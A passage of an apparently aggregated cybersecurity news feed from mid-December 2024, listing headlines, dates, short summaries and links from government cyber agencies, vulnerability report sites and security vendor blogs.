costs have eroded profitability. However, this may be an emerging opportunity for GenAI. Semi-autonomous agents trained to flag basic AML violations (for example, website contact details listed on OFAC, perhaps) and elastic agents that deploy on demand when a new merchant application is submitted would assist AML compliance efforts and help the financial services industry grappling with a tsunami of fraudulent merchant transactions.

https://www.recordedfuture.com/blog/fraud-funding-terrorism
Foxit Reader 3D Page Object Use-After-Free Vulnerability
2024-12-18T00:00:00Z | 1734480000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2094
Foxit Reader Checkbox Calculate CBF_Widget Use-After-Free Vulnerability
2024-12-18T00:00:00Z | 1734480000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2093
Vectra AI vs. Darktrace – Top Reasons Security teams prefer Vectra AI over Darktrace by Nicole Drake
2024-12-18T00:00:00Z | 1734480000

Discover why security teams prefer Vectra AI over Darktrace for NDR. Learn about superior scalability, signal fidelity and seamless deployment options.

https://www.vectra.ai/blog/vectra-ai-vs-darktrace-top-reasons-security-teams-prefer-vectra-ai-over-darktrace
Empowering Women in Cybersecurity: Lessons from the FS-ISAC Women?s Networking Event
2024-12-17T14:00:00Z | 1734444000

Discover strategies for empowering women in cybersecurity, gleaned from lessons learned at the 2024 FS-ISAC women?s networking event.

https://www.akamai.com/blog/news/2024/dec/lessons-from-the-fs-isac-womens-networking-event
National Cyber Security Centre's weekly review 50/2024
2024-12-17T12:34:53Z | 1734438893

This week we cover topics such as the new Lumma Stealer malware spreading method and how human error can result in a data leak.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-502024
National Cyber Security Centre's weekly review 50/2024
2024-12-17T12:34:53Z | 1734438893

This week we cover topics such as the new Lumma Stealer malware spreading method and how human error can result in a data leak.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-502024
UK and allies expose evolving tactics of Russian cyber actors
2024-12-17T11:53:03Z | 1734436383

New advisory reveals evolving tactics used by Russian state-linked cyber actors as more organisations move to cloud-based infrastructure.

https://www.ncsc.gov.uk/news/uk-allies-expose-evolving-tactics-of-russian-cyber-actors
SVR cyber actors adapt tactics for initial cloud access
2024-12-17T11:51:08Z | 1734436268

How SVR-attributed actors are adapting to the move of government and corporations to cloud infrastructure.

https://www.ncsc.gov.uk/news/svr-cyber-actors-adapt-tactics-for-initial-cloud-access
NCSC lifts lid on three random words password logic
2024-12-17T11:40:04Z | 1734435604

The logic of using three random words for strong passwords and why the NCSC advises the approach.

https://www.ncsc.gov.uk/news/ncsc-lifts-lid-on-three-random-words-password-logic
Schoolgirls across the UK crowned winners at cyber competition finals
2024-12-17T11:38:04Z | 1734435484

Thirteen teams around the country claimed victory at the finals of the new-look 2022 CyberFirst Girls Competition.

https://www.ncsc.gov.uk/news/schoolgirls-across-the-uk-crowned-winners-at-cyber-competition-finals
Schoolgirls across the UK poised to battle for crown of cyber champions
2024-12-17T11:37:20Z | 1734435440

The CyberFirst Girls Competition's finals will take place across the UK.

https://www.ncsc.gov.uk/news/schoolgirls-across-the-uk-poised-to-battle-for-crown-of-cyber-champions
Tech-savvy schools gain recognition from UK experts for championing cyber skills
2024-12-17T11:36:23Z | 1734435383

Eight more schools and colleges receive CyberFirst schools award for first-rate cyber security teaching.

https://www.ncsc.gov.uk/news/tech-savvy-schools-gain-recognition-from-uk-experts
Students tackle tech innovation challenge set by UK cyber experts
2024-12-17T11:35:39Z | 1734435339

First ever Innovators Challenge held in Manchester for students studying NCSC-certified degrees.

https://www.ncsc.gov.uk/news/students-tackle-tech-innovation-challenge-set-by-uks-cyber-experts
Schools offered free cyber defence tools to help keep out attackers
2024-12-17T11:33:50Z | 1734435230

UK education settings can sign up for the NCSC's Web Check and Mail Check services to protect their websites and email servers from cyber attacks.

https://www.ncsc.gov.uk/news/schools-offered-free-cyber-defence-tools-to-help-keep-out-attackers
NCSC reveals top government email impersonation scams taken down in 2022
2024-12-17T11:21:51Z | 1734434511

Public encouraged to continue reporting suspicious emails after 6.4 million reports were received in 2022.

https://www.ncsc.gov.uk/news/ncsc-reveals-top-government-email-impersonation-scams-taken-down-in-2022
Schoolgirls across UK prepare to vie for crown of cyber security champion
2024-12-17T11:20:24Z | 1734434424

Girls prepare to go head-to-head at the finals of the 2023 CyberFirst Girls Competition, run by GCHQ’s National Cyber Security Centre.

https://www.ncsc.gov.uk/news/schoolgirls-across-uk-prepare-to-vie-for-crown-of-cyber-security-champion
Pupils across the UK crowned champions of the NCSC cyber contest for girls
2024-12-17T11:15:54Z | 1734434154

Thirteen teams around the country claimed victory at the finals of the 2023 CyberFirst Girls Competition

https://www.ncsc.gov.uk/news/pupils-across-the-uk-crowned-champions-of-the-ncsc-cyber-contest-for-girls
Teachers encouraged to enter schoolgirls into UK's flagship cyber security contest
2024-12-17T11:08:51Z | 1734433731

Registration opens for the CyberFirst Girls competition 2023/2024.

https://www.ncsc.gov.uk/news/teachers-encouraged-to-enter-schoolgirls-into-uks-flagship-cyber-security-contest
UK schoolgirls secure victory as champions of NCSC cyber skills contest
2024-12-17T11:05:08Z | 1734433508

Teams of schoolgirls from across the UK have been crowned cyber security champions.

https://www.ncsc.gov.uk/news/uk-schoolgirls-secure-victory-of-ncsc-cyber-skills-contest
UK's cultural institutions gather for summit on the cyber threat
2024-12-17T11:03:56Z | 1734433436

Organisations across the UK’s culture sectors have been coached on how to reduce the risk of falling victim to cyber criminals.

https://www.ncsc.gov.uk/news/uk-cultural-institutions-gather-for-summit-on-the-cyber-threat
Recognising UK-based security researchers who have disclosed vulnerabilities to UK government
2024-12-17T11:01:57Z | 1734433317

The NCSC recently hosted a small number of those who have helped make UK government services more secure and resilient.

https://www.ncsc.gov.uk/news/recognising-uk-based-security-researchers
NCSC statement following reports of a Synnovis data breach
2024-12-17T10:47:46Z | 1734432466

The NCSC has published advice on protecting yourself against the impact of data breaches.

https://www.ncsc.gov.uk/news/ncsc-statement-following-reports-of-a-synnovis-data-breach
Team of British women to take part in international cyber event in Japan
2024-12-17T10:33:03Z | 1734431583

A team of CyberFirst Bursary alumni will join teams from Japan, the USA, and Europe at the inaugural Kunoichi Cyber Games in November.

https://www.ncsc.gov.uk/news/team-british-women-take-part-international-cyber-event-japan
Crawling December: Faceted navigation
2024-12-17T10:00:00Z | 1734429600

Faceted navigation is a great way to help users find what they need on your site, but it can create an SEO nightmare if not implemented carefully. Why? Because it can generate a near-infinite number of URLs, which causes all sorts of crawling problems.

https://developers.google.com/search/blog/2024/12/crawling-december-faceted-nav
TSUBAME Report Overflow (Jul-Sep 2024)
2024-12-17T06:40:00Z | 1734417600

This TSUBAME Report Overflow series discuss monitoring trends of overseas TSUBAME sensors and other activities which the Internet Threat Monitoring Quarterly Reports does not include. This article covers the monitoring results for the period of July to September 2024. Packets...

https://blogs.jpcert.or.jp/en/2024/12/tsubame_overflow_2024-07-09.html
High Threat Security Alert (A24-12-13): Vulnerability in Apache Struts
2024-12-17T04:00:00Z | 1734408000

The Apache Software Foundation has released a security bulletin to address the vulnerability in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Guia para a Seleção de Soluções de Autenticação Multifator do CNCS
2024-12-17T00:00:00Z | 1734393600

Está disponível o Guia para a Seleção de Soluções de Autenticação Multifator, um referencial que apresenta uma abordagem estruturada e adaptada às necessidades específicas de cada organização no processo de adoção de mecanismos de autenticação multifator. O documento apresenta um esquema para o processo de seleção destes mecanismos, dividido em três fases: Contexto Organizacional; Categorização de Serviços; Mapeamento de Mecanismos de Autenticação. Esta sequência proporciona uma orientação clara e prática para a adoção eficaz de soluções de autenticação multifator, que permite equilibrar segurança com eficiência operacional, custos e usabilidade. Quem pode beneficiar: Pessoas com responsabilidades de gestão do sistema de segurança de informação de uma organização (CIO ou CISO); Pessoas com um papel de desenho, desenvolvimento, implementação ou integração de uma solução de autenticação; Pessoas com um papel técnico na configuração das várias ferramentas que permitem a autenticação no sistema de informação sob a sua responsabilidade; Equipas técnicas. O Guia para a Seleção de Soluções de Autenticação Multifator é uma ferramenta que pode ser usada por todos os que considerem poder beneficiar da sua leitura. Sobre a Autenticação Multifator (MFA) É um processo que envolve a verificação de identidade através de um conjunto de critérios únicos, como por exemplo uma combinação de nome de utilizador e palavra-passe, tokens de autorização, cartão de identificação e/ou dados biométricos.Consultar o Guia para a Seleção de Soluções de Autenticação Multifator

https://dyn.cncs.gov.pt/pt/detalhe/art/135906/guia-para-a-selecao-de-solucoes-de-autenticacao-multifator-do-cncs
Vectra AI vs. Darktrace: Why 91% of Customers Choose Vectra by Mark Wojtasiak
2024-12-17T00:00:00Z | 1734393600

Discover why 91% of customers prefer Vectra AI over Darktrace for accurate attack signal intelligence and superior cybersecurity solutions.

https://www.vectra.ai/blog/vectra-vs-darktrace
Three random words or #thinkrandom
2024-12-16T17:15:30Z | 1734369330

Ian M discusses what makes a good password

https://www.ncsc.gov.uk/blog-post/three-random-words-or-thinkrandom-0
What does the NCSC think of password managers?
2024-12-16T17:15:04Z | 1734369304

Emma W discusses the question everyone keeps asking us.

https://www.ncsc.gov.uk/blog-post/what-does-ncsc-think-password-managers
Secure home working on personal IT
2024-12-16T17:04:34Z | 1734368674

Useful tips and resources for people using personal IT to work from home.

https://www.ncsc.gov.uk/blog-post/secure-home-working-personal-it
ESET Threat Report H2 2024: Key findings
2024-12-16T16:57:45Z | 1734368265

ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for staying secure in 2025

https://www.welivesecurity.com/en/videos/eset-threat-report-h2-2024-key-findings/
OWASP Top 10 LLM-Bedrohungen: Wie Skyhigh SSE den Weg anführt
2024-12-16T15:45:49Z | 1734363949

The rapid adoption of Large Language Models (LLMs) has revolutionized organizations’ use of AI, from improving customer interactions to enabling... The post OWASP Top 10 LLM Threats: How Skyhigh SSE Leads the Way appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/owasp-top-10-llm-threats.html
Consumer Optimism Slips as Generational Divides Persist
2024-12-16T14:46:03Z | 1734360363

·       Consumer optimism about household finances over the next 12 months drops to 44%·       Two in five (40%) Gen Z consumers expect they will be unable to pay their current bills and loans in full compared to 10% of Baby Boomers·       However, twice as many Gen Z (68%) consumers are optimistic about the future of their household finances in the next 12 months compared to Gen X (33%).·       As housing costs continue to squeeze consumers, 57% of Millennials rank rent or mortgage as one of their top concerns, while only 24% of Baby Boomers feel the same.Consumer optimism about household finances has fallen, according to data from TransUnion, a global information and insights company, released as part of its Q4 2024 UK Consumer Pulse report.The latest survey data finds that just 44% of consumers are optimistic about their household finances in the next 12 months, dropping by two percentage points from the previous quarter. This bucks the trend of rising optimism since Q4 2023.Financial pressures are affecting consumer attitudes to spendingJames O’Donnell, Director of Research & Consulting at TransUnion in the UK, comments: “As household price inflation climbs back up to 3.2%, in conjunction with higher winter energy prices and a slowing jobs market, many consumers are feeling the squeeze and responding accordingly with their wallets. It’s not surprising that we’re seeing attitudes, credit behaviours and spending diverge between generations and income groups. It’s therefore crucial that businesses and financial institutions understand and adapt to the evolving financial landscape."With inflation and cost-of-living pressures, not surprisingly, consumer spend intentions reflected those financial pressures with nearly half (43%) of respondents planning to decrease discretionary spending, including dining out, travel and entertainment, in the next 3 months.The report found that price pressures are having a deeply uneven impact across generational lines. Two in five (40%) Gen Z consumers expect they will be unable to pay their current bills and loans in full, compared to 10% of Baby Boomers. Meanwhile, more than one in 10 (16%) Millennials said they increased their usage of available credit in the last three months to meet shortfalls in their finances.Increasing housing costs are further driving the generational divideThe generational divide in financial health is partly driven by the increasing housing costs. While 57% of Millennials rank rent or mortgage as one of their top concerns, only 24% of Baby Boomers feel the same.Despite these prevailing housing and price pressures, the Consumer Pulse Report shows that consumer optimism is somewhat skewed toward the younger generations. Twice as many Gen Z (68%) consumers are optimistic about the future of their household finances in the next 12 months compared to Gen X (33%).This optimism divide may be driven by divergence in income growth; 51% of Gen Z and 36% of Millennials said their incomes are keeping up with the rate of inflation, compared to only 20% of Gen X. Gen Z was also the only generation that said they plan to increase discretionary spend more than they plan to decrease it over the next three months. Meanwhile, more than one in 10 (16%) Millennials have increased their usage of available credit in the last three months to meet shortfalls in their finances.For more information about the Consumer Pulse study findings, please visit the TransUnion website.Notes:Unless otherwise stated, all figures are from TransUnion’s Consumer Pulse study, which is based on the survey of 1,000 adults in the UK, conducted between 25 September and 4 October 2024.Generations are defined in this research as follows: Gen Z, 18–26 years old; Millennials, 27–42 years old; Gen X, 43–58 years old; and Baby Boomers, age 59 and above.Low- and middle-income earners are defined as consumers earning below £79,999 annually.

https://newsroom.transunion.co.uk/consumer-optimism-slips-as-generational-divides-persist/
Lessons From the Field: How a Hospital Turned Cyber Challenges Into a Success Story
2024-12-16T14:00:00Z | 1734357600

Every day, a renowned hospital serves the needs of over a million patients, delivering not only world-class care but also hope for healthier futures. But behind the scenes, the hospital’s small but mighty security team was feeling the strain. With two hospital campuses, multiple regional centers, and more than 50 care locations, the pressure to […] The post Lessons From the Field: How a Hospital Turned Cyber Challenges Into a Success Story  appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/lessons-from-the-field-how-a-hospital-turned-cyber-challenges-into-a-success-story/
Cato CTRL Threat Research: Sophisticated Data Exfiltration Tools Used in Double Extortion Ransomware Attacks by Hunters International and Play
2024-12-16T13:25:00Z | 1734355500

Executive Summary Modern ransomware attacks have evolved beyond simple encryption to deploy sophisticated double extortion tactics. Threat actors now systematically exfiltrate sensitive data before encrypting systems, ensuring leverage even when victims have robust data backups. Some ransomware gangs have even abandoned encryption altogether, recognizing that the threat of data exposure often proves more compelling for... The post Cato CTRL Threat Research: Sophisticated Data Exfiltration Tools Used in Double Extortion Ransomware Attacks by Hunters International and Play  appeared first on Cato Networks.

https://www.catonetworks.com/blog/sophisticated-data-exfiltration-tools-used-in-double-extortion-ransomware-attacks/
Diving into ADB protocol internals (2/2)
2024-12-16T13:00:31Z | 1734354031

https://www.synacktiv.com/publications/diving-into-adb-protocol-internals-22.html
ESET Threat Report H2 2024
2024-12-16T10:00:00Z | 1734343200

A view of the H2 2024 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts

https://www.welivesecurity.com/en/eset-research/eset-threat-report-h2-2024/
Vectra AI Named a Leader in IDC MarketScape for Worldwide Network Detection and Response by Nicole Drake
2024-12-16T00:00:00Z | 1734307200

Discover how Vectra NDR's AI-driven capabilities deliver unparalleled attack signal intelligence and help streamline cybersecurity workflows.

https://www.vectra.ai/blog/vectra-ai-named-a-leader-in-idc-marketscape-for-worldwide-network-detection-and-response
"Повідомлення про порушення" від UAC-0099 (CERT-UA#12463)
2024-12-14T13:12:09Z | 1734181929

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA протягом листопада-грудня 2024 року досліджено низку кібератак, здійснених угрупуванням UAC-0099 у відношенні ряду державних організацій, зокрема, лісництв, установ судово-медичної експертизи, заводів та інших.

https://cert.gov.ua/article/6281681
Black Hat Europe 2024: Hacking a car – or rather, its infotainment system
2024-12-13T15:52:23Z | 1734105143

Our ‘computers on wheels’ are more connected than ever, but the features that enhance our convenience often come with privacy risks in tow

https://www.welivesecurity.com/en/privacy/black-hat-europe-2024-hacking-car-infotainment-system/
CERT.LV activity review Q3 2024
2024-12-13T15:30:19Z | 1734103819

Geopolitical and ideological conflicts continue to be strong drivers of cyber attacks. Since the Russian invasion of Ukraine, the level of cyber threats in Latvia has increased significantly.

https://cert.lv/en/2024/12/cert-lv-activity-review-q3-2024
Akamai?s Perspective on December?s Patch Tuesday 2024
2024-12-13T14:00:00Z | 1734098400

https://www.akamai.com/blog/security-research/2024/dec/akamai-perspective-patch-tuesday-december-2024
Akamai Technical Academy and Coursera: A Year of STEM Education Success
2024-12-13T13:00:00Z | 1734094800

https://www.akamai.com/blog/culture/2024/dec/a-year-of-stem-education-success
DeepSpeed: a tuning tool for large language models
2024-12-13T11:30:50Z | 1734089450

SophosAI’s framework for upgrading the performance of LLMs for cybersecurity tasks (or any other specific task) is now open source.

https://news.sophos.com/en-us/2024/12/13/deepspeed-a-tuning-tool-for-large-language-models/
Black Hat Europe 2024: Why a CVSS score of 7.5 may be a 'perfect' 10 in your organization
2024-12-13T11:16:56Z | 1734088616

Aggregate vulnerability scores don’t tell the whole story – the relationship between a flaw’s public severity rating and the specific risks it poses for your company is more complex than it seems

https://www.welivesecurity.com/en/cybersecurity/black-hat-europe-2024-cvss-score-75-10-your-organization/
Search Central Live Kuala Lumpur and Taipei 2024: Recap
2024-12-13T10:00:00Z | 1734084000

The Search Central Live events in Kuala Lumpur and Taipei were nothing short of amazing, in large thanks to the over 600 people who attended the events! We were thrilled to see the level of enthusiasm and engagement from attendees even if, on the day prior to the Taipei event, we collectively had to deal with typhoon Kong Rey, the first supertyphoon in Taiwan's history to make landfall after mid-October. Here's a deeper dive into what made these events so special and what's next.

https://developers.google.com/search/blog/2024/12/scl-asia-h2-recap
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. december
2024-12-13T09:46:14Z | 1734083174

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-december/
Security Alert (A24-12-12): Multiple Vulnerabilities in Microsoft Edge
2024-12-13T04:00:00Z | 1734062400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Vier Schritte zur Anpassung an das NIST AI Framework mit Skyhigh SSE
2024-12-12T17:11:22Z | 1734023482

As AI and large language models (LLMs) transform businesses, they bring both opportunities and risks. While AI drives efficiency and... The post Four Steps to Align with NIST AI Framework Using Skyhigh SSE appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/four-steps-to-align-with-nist-ai-framework-using-skyhigh-sse.html
ESG Watch | December 2024
2024-12-12T14:13:00Z | 1734012780

Key news in this edition: EU Council adopts new ESG ratings regulations. Republican States sue BlackRock, Vanguard, and State Street over antitrust violations. Plastic treaty negotiations collapse over disputes on production limits. Editorial November 2024 marked significant developments in ESG accountability, with new regulations and high-profile lawsuits continuing to shape the global sustainability landscape. The EU Council adopted the Regulation on the Transparency and Integrity of ESG Rating Activities, marking an important step in the standardisation of ESG ratings. This new legislation aims to make ESG ratings more consistent, requiring agencies operating in the EU to disclose methodologies and data sources. By increasing transparency, the regulation seeks to address criticisms of greenwashing and boost investor confidence in ESG financial products. Set to take effect in 2026, the EU’s framework could set a global benchmark for ESG governance.

https://www.s-rminform.com/esg-watch/esg-watch-december-2024-0
Black Hat Europe 2024: Can AI systems be socially engineered?
2024-12-12T14:07:06Z | 1734012426

Could attackers use seemingly innocuous prompts to manipulate an AI system and even make it their unwitting ally?

https://www.welivesecurity.com/en/cybersecurity/black-hat-europe-2024-ai-systems-socially-engineered/
NSM anbefaler overgang til phishingresistent autentisering
2024-12-12T13:34:27Z | 1734010467

NSM anbefaler virksomheter å gå over til passnøkler (passkeys) eller andre FIDO2-implementasjoner for autentisering. Årsaken er at aktører i økende grad tar seg forbi tradisjonell flerfaktorautentisering.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/nsm-anbefaler-overgang-til-phishingresistent-autentisering
Aryaka Wins Network World Award for Best Unified SASE in Enterprise Networking
2024-12-12T13:00:06Z | 1734008406

Santa Clara, CA, December 12, 2024 – Aryaka® today announced that its market-defining Unified SASE as a Service has won the Network World Best of Enterprise Networking (BENNY) award in the category of “SD-WAN, SASE.” The awards recognize the best and most innovative networking products each year. “Hybrid work, AI adoption, and increasing cybersecurity threats... The post Aryaka Wins Network World Award for Best Unified SASE in Enterprise Networking appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-network-world-best-enterprise-network-award/
What To Do When You?re Under a DDoS Attack: A Guide to Action
2024-12-12T13:00:00Z | 1734008400

https://www.akamai.com/blog/security/2024/dec/what-to-do-under-a-ddos-attack
RIA ennetusportaal itvaatlik.ee sai uue sisu ja vormi
2024-12-12T12:03:31Z | 1734005011

Alates 11. detsembrist on uuendatud kujul kättesaadav Riigi Infosüsteemi Ameti (RIA) küberturvalisuse ennetusportaal itvaatlik.ee: uuenduskuuri läbisid nii veebikeskkonna välimus, struktuur kui ka sisu.

https://ria.ee/uudised/ria-ennetusportaal-itvaatlikee-sai-uue-sisu-ja-vormi
An improved way to view your recent performance data in Search Console
2024-12-12T10:00:00Z | 1733997600

To better help you monitor the recent performance of your content, we're launching the '24 hours' view to the SC performance reports and improving the freshness of the data. We're rolling out these changes to all properties gradually over the next few months, so you might not see changes right away.

https://developers.google.com/search/blog/2024/12/recent-data-search-console
Riigiportaali uus infoteenus lihtsustab abielulahutuse protsessi
2024-12-12T08:57:08Z | 1733993828

Alates detsembri algusest saab abielu lahutuse avaldust esitada elektroonselt, muutes protsessi mugavamaks ja paindlikumaks – lahutustahte väljendamiseks piisab nüüd vaid internetiühendusest ning perekonnaseisuasutusse ei pea kohale minema. Riigiportaali eesti.ee uus infoteenus pakub põhjalikku teavet abielu lahutamise kohta, sealhulgas menetluse käigust, vajalike dokumentide esitamisest ning vara ja lastega seotud küsimustest.

https://ria.ee/uudised/riigiportaali-uus-infoteenus-lihtsustab-abielulahutuse-protsessi
Leveraging MAC Address Logic for IoT Classification
2024-12-12T08:37:19Z | 1733992639

When an enterprise looks for a network security provider, whether implementing a SASE solution or [against their better judgement] not, one of its pillar requirements is complete visibility of the assets it holds, which provides the ability to manage its devices. Identifying devices in a network, commonly known as device fingerprinting, provides an enterprise with... The post Leveraging MAC Address Logic for IoT Classification  appeared first on Cato Networks.

https://www.catonetworks.com/blog/leveraging-mac-address-logic-for-iot-classification/
New EMA Zero Trust Report: The Role of Network Teams
2024-12-12T07:59:37Z | 1733990377

The new 2024 EMA Zero Trust Report examines how network and security teams collaborate on Zero Trust architectures. It emphasizes DNS’s role in network segmentation, policy enforcement, observability, and threat detection, providing utmost Zero Trust reward for limited investment. The new 2024 EMA Zero Trust Report explores how network and security teams collaborate to implement… The post New EMA Zero Trust Report: The Role of Network Teams appeared first on EfficientIP.

https://efficientip.com/blog/new-ema-zero-trust-report-the-role-of-network-teams/
The Emerging Role of the BISO
2024-12-12T07:19:13Z | 1733987953

The post The Emerging Role of the BISO appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-what-are-the-top-3-concerns-of-biso-today
Security Alert (A24-12-11): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-12-12T04:00:00Z | 1733976000

Apple has released iOS 18.2, iPadOS 17.7.3 and iPadOS 18.2 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Publicado estudo sobre a Educação para a Cibersegurança no Ensino Básico e Secundário em Portugal
2024-12-12T00:00:00Z | 1733961600

Foi publicado o Estudo sobre a Educação para a Cibersegurança no Ensino Básico e Secundário em Portugal, realizado pela Universidade do Porto para o Observatório de Cibersegurança do Centro Nacional de Cibersegurança (CNCS), através do qual se faz o mapeamento das iniciativas, programas e conteúdos curriculares de cibersegurança no ensino básico e secundário em Portugal, comparando essas práticas com outros países da União Europeia. Este estudo incluiu a análise de documentos estratégicos, manuais escolares e um inquérito feito aos Agrupamentos de Escolas e Escolas não agrupadas a nível nacional, para identificar as iniciativas desenvolvidas e a frequência com que a cibersegurança é abordada nas disciplinas. Além disso, foram realizadas entrevistas com professores e outros atores relevantes com o objetivo de recolher as perspetivas sobre as práticas escolares e as necessidades na educação para a cibersegurança, permitindo, desta forma, ter uma visão detalhada da situação atual e das lacunas existentes. Numa perspetiva de futuro, e de acordo com os dados analisados, o estudo identifica algumas recomendações: A educação para a cibersegurança deve ser mais ampla e integrada, sendo essencial desenvolver de forma contínua atividades de segurança digital em várias disciplinas escolares, indo além das Tecnologias de Informação e Comunicação, para que os alunos desenvolvam hábitos consistentes ao longo dos anos; Esta abordagem deve ser tanto quanto possível permanente e integrada, e não figurar apenas em eventos/atividades pontuais desenvolvidas pelas Escolas; A formação contínua de professores é fundamental, bem como a colaboração com bibliotecas, autarquias e com o Centro Nacional de Cibersegurança, para expandir e ampliar o alcance das iniciativas desenvolvidas; A criação de um ecossistema digital de gestão de atividades de cibersegurança nas escolas e a implementação de processos contínuos de monitorização e avaliação são, também, essenciais para maximizar o impacto das iniciativas e adaptar as ações conforme necessário. O estudo sobre a Educação para a Cibersegurança ao nível do Ensino Básico e Secundário, bem como o trabalho sobre o Ensino pós-secundário e Superior de Cibersegurança, publicado em 2022, no âmbito do Observatório de Cibersegurança do CNCS, contribuem para o conhecimento do panorama da educação para a cibersegurança, em Portugal. Consulte a versão integral do estudoConsulte a versão do estudo em 15 minutos

https://dyn.cncs.gov.pt/pt/detalhe/art/135905/publicado-estudo-sobre-a-educacao-para-a-ciberseguranca-no-ensino-basico-e-secundario-em-portugal
The Silent Storm: Inside Salt Typhoon's Massive Telco Cyberattack by Lucie Cardiet
2024-12-12T00:00:00Z | 1733961600

Salt Typhoon targets global telcos. Learn how improved visibility, hardening, and Vectra AI help defend against these advanced threats.

https://www.vectra.ai/blog/the-silent-storm-inside-salt-typhoons-massive-telco-cyberattack
Education Sector Faces Growing Cybersecurity Challenges in 2025
2024-12-11T19:35:43Z | 1733945743

The post Education Sector Faces Growing Cybersecurity Challenges in 2025 appeared first on iboss.

https://www.iboss.com/blog/education-sector-faces-growing-cybersecurity-challenges-in-2025/
Addressing Loss Prevention and Keeping Retail Customers Safe
2024-12-11T16:00:00Z | 1733932800

In a pleasant retail environment, there’s likely a lot going on behind the scenes. Learn how businesses are using next-gen physical security solutions to keep guests and employees safe, protect merchandise, and fend off fraud—even during chaotic peaks of holiday shopping. The post Addressing Loss Prevention and Keeping Retail Customers Safe appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/12/addressing-loss-prevention-and-keeping-retail-customers-safe/
Cleo Harmony, VLTrader, and LexiCom - RCE via Arbitrary File Write (CVE-2024-50623)
2024-12-11T14:56:58Z | 1733929018

We were having a nice uneventful week at watchTowr, when we got news of some ransomware operators using a zero-day exploit in Cleo MFT software - namely, LexiCom, VLTransfer, and Harmony - applications that many large enterprises rely on to share files securely.Cleo have a (paywalled) advisory, linked to

https://labs.watchtowr.com/cleo-cve-2024-50623/
Auditing the Ruby ecosystem’s central package repository
2024-12-11T14:00:59Z | 1733925659

Ruby Central hired Trail of Bits to complete a security assessment and a competitive analysis of RubyGems.org, the official package management system for Ruby applications. With over 184+ billion downloads to date, RubyGems.org is critical infrastructure for the Ruby language ecosystem. This is a joint post with the Ruby Central team; read their announcement here! […]

https://blog.trailofbits.com/2024/12/11/auditing-the-ruby-ecosystems-central-package-repository/
Teaching an Old Framework New Tricks: The Dangers of Windows UI Automation
2024-12-11T14:00:00Z | 1733925600

https://www.akamai.com/blog/security-research/2024/dec/2024-december-windows-ui-automation-attack-technique-evades-edr
IoT/OT security that works as hard as your devices
2024-12-11T10:13:10Z | 1733911990

The post IoT/OT security that works as hard as your devices  appeared first on Cato Networks.

https://www.catonetworks.com/resources/iot-ot-security-that-works-as-hard-as-your-devices/
Attack Exploiting Legitimate Service by APT-C-60
2024-12-11T06:55:00Z | 1733900100

JPCERT/CC has confirmed an attack agains...

https://blogs.jpcert.or.jp/en/2024/12/APT-C-60.html
High Threat Security Alert (A24-12-07): Multiple Vulnerabilities in Microsoft Products (December 2024)
2024-12-11T04:00:00Z | 1733889600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-12-08): Multiple Vulnerabilities in Ivanti Products
2024-12-11T04:00:00Z | 1733889600

Ivanti has released security advisories to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-12-09): Multiple Vulnerabilities in Google Chrome
2024-12-11T04:00:00Z | 1733889600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-12-10): Multiple Vulnerabilities in Adobe Reader/Acrobat
2024-12-11T04:00:00Z | 1733889600

Patches are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader Font gvar per-tuple-variation-table Out-Of-Bounds Read Vulnerability
2024-12-11T00:00:00Z | 1733875200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2064
Adobe Acrobat Reader Font Private Point Numbers Out-Of-Bounds Read Vulnerability
2024-12-11T00:00:00Z | 1733875200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2070
Adobe Acrobat Reader Font Program Function Definition Out-Of-Bounds Read Vulnerability
2024-12-11T00:00:00Z | 1733875200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2076
Call: Industry-Academia Network da Cybersecurity Skills Academy
2024-12-11T00:00:00Z | 1733875200

A Comissão Europeia lançou uma nova iniciativa no âmbito da Cyber Skills Academy: a Industry-Academia Network, que visa unir forças entre a indústria e o meio académico para combater o défice de competências em cibersegurança.  Objetivos: Desenvolver competências avançadas no domínio da cibersegurança. Alinhar programas de formação às necessidades reais do mercado. Preparar cidadãos e profissionais para os desafios digitais. Quem pode participar?O  NCC-PT - Centro Nacional de Coordenação incentiva empresas, instituições académicas e organizações interessadas em contribuir para a resiliência digital na Europa a responder à call. Data limite: 5 de janeiro de 2024 Saiba mais

https://dyn.cncs.gov.pt/pt/detalhe/art/135904/call-industry-academia-network-da-cybersecurity-skills-academy
Security Advisory - Path Traversal Vulnerability in Huawei Home Music System
2024-12-11T00:00:00Z | 1733875200

